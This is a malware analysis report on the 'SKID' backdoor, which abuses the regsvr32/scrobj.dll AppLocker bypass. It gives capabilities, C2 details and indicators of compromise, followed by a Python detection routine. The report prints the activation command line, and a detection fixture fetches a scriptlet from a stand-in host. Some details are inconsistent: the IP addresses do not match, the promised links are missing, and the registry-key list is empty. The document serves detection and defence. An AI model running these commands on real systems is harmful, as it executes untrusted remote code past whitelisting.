Analyzing a customer endpoint, we identified a new threat that exploits a recent Microsoft Windows OS exploitation technique, discovered in April 2016 and called “AppLocker Bypass”.
We called this threat “SKID” because the code contains many keywords with this name.
Indicators of Compromise to detect compromised endpoints are provided below.
APPLOCKER BYPASS – EXPLOITATION TECHNIQUE
The new threat, identified as “SKID”, uses a recent Windows OS exploitation technique called “AppLocker Bypass”; thanks to this technique it is possible to execute VB or JS scripts through the system process regsvr32.exe.
This exploitation technique, discovered in April 2016, is documented in detail at the following links:
“SKID” is activated with the following command line:
regsvr32.exe /s /n /u /i:"C:\Users\[username]\AppData\Roaming\9DB0F2C13D.txt" scrobj.dll
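Added here as a detection example (not code from the original report): a small Python triage routine that flags regsvr32 process-creation events matching the /i:<script> plus scrobj.dll pattern quoted above. The Sysmon-style field names and the sample events are constructed, and the check also covers the remote-URL variant of the same technique.

```python
import re

# Constructed sample process-creation records (Sysmon-style field names are an
# assumption); the first mirrors the command line quoted in this report.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": r'regsvr32.exe /s /n /u /i:"C:\Users\bob\AppData\Roaming\9DB0F2C13D.txt" scrobj.dll'},
    {"Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": r'regsvr32.exe /s "C:\Program Files\Vendor\vendor.dll"'},
    {"Image": r"C:\Windows\SysWOW64\regsvr32.exe",
     "CommandLine": r'regsvr32 /s /n /u /i:https://example.test/x.sct scrobj.dll'},
]

# The /i: argument of regsvr32, either quoted or bare
SCRIPT_ARG = re.compile(r'/i:(?:"([^"]*)"|(\S+))', re.IGNORECASE)
SCRIPTLET_HOST = re.compile(r"\bscrobj\.dll\b", re.IGNORECASE)


def analyze_regsvr32(command_line):
    """Return the reasons a regsvr32 command line matches the scriptlet
    execution pattern (/i:<script> with scrobj.dll); empty list if none."""
    reasons = []
    m = SCRIPT_ARG.search(command_line)
    if not m:
        return reasons  # no /i: argument: ordinary DLL registration
    target = m.group(1) if m.group(1) is not None else m.group(2)
    if SCRIPTLET_HOST.search(command_line):
        reasons.append("scrobj.dll loaded with /i: scriptlet")
    if re.match(r"^(https?|ftp)://", target, re.IGNORECASE):
        reasons.append("scriptlet fetched from remote URL")
    low = target.lower()
    if "\\appdata\\" in low or "\\temp\\" in low:
        reasons.append("scriptlet stored in a user-writable directory")
    if not low.endswith(".sct"):
        reasons.append("scriptlet with unexpected extension")
    return reasons


def triage(events):
    """Map each suspicious regsvr32 CommandLine to its detection reasons."""
    hits = {}
    for ev in events:
        if not ev["Image"].lower().endswith("\\regsvr32.exe"):
            continue
        reasons = analyze_regsvr32(ev["CommandLine"])
        if reasons:
            hits[ev["CommandLine"]] = reasons
    return hits
```

Running triage(SAMPLE_EVENTS) flags the report's command line and the remote-URL variant, while the plain DLL registration is left alone.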
The analyzed file has the following details:
File name: 9DB0F2C13D.txt
File path: C:\Users\[username]\AppData\Roaming\
File size: 14646 Bytes
From the first lines of the file header it is possible to notice that it is a JavaScript script, but the code appears obfuscated.
Deobfuscating the code, we obtained the following evidence:
- There is a function that checks the Internet connection by making an HTTP request to the update.microsoft.com host
- The backdoor executes HTTP GET requests to the 18.104.22.168 host
- It reads the registry key HKEY_CURRENT_USER\Software\Microsoft\Notepad\<username>, in which we can find references to the installed backdoor
- It verifies whether the threat is already installed by checking through WMI if the regsvr32 process is running
This first file appears to be a real downloader, created ad hoc to exploit the technique described.
File name: changelog.txt
Downloaded from: hxxps://webmail.xcloud.kz/js/changelog.txt
File size: 43686 Bytes
As with the first file, the header is very similar.
The backdoor is able to obtain the following information:
- Operating system and architecture (32 or 64 bit)
- Whether one of the following antivirus products is installed or running on the system:
  - Windows Defender
  - 360 Total Security
  - Seqrite EndPoint Security
  - Quick Heal
  - Bitdefender Endpoint Security
- Computer serial number
- Local computer IP
- Installed backdoor version (v2.0 at the time of the analysis)
With this backdoor the attacker can perform the following tasks:
- Download and execution of binary files (.exe and .dll)
- Download of .js or .vbs scripts using the “AppLocker Bypass” technique
- Removal of the threat from the victim PC
- Remote command execution on the victim PC
CnC – DOMAIN ANALYSIS
The CnC identified is the following:
The domain xcloud.kz was registered on 15 November 2016, and the SSL certificate of the webmail.xcloud.kz host is valid from 15 November 2016 to 16 November 2017.
From this evidence it is possible to speculate that the attacker implemented and distributed the first versions of the backdoor at the end of 2016.
INDICATORS OF COMPROMISE
The IoCs useful to investigate and verify whether the threat is present on other endpoints are the following:
– NETWORK ACTIVITY
CnC IP: 22.214.171.124
CnC hostname: webmail.xcloud.kz
CnC URL: hxxps://webmail.xcloud.kz/js/ajax.php
Anomalous behaviour: outbound connections to 126.96.36.199 (Google IP) on port 80, HTTP protocol
– REGISTRY KEYS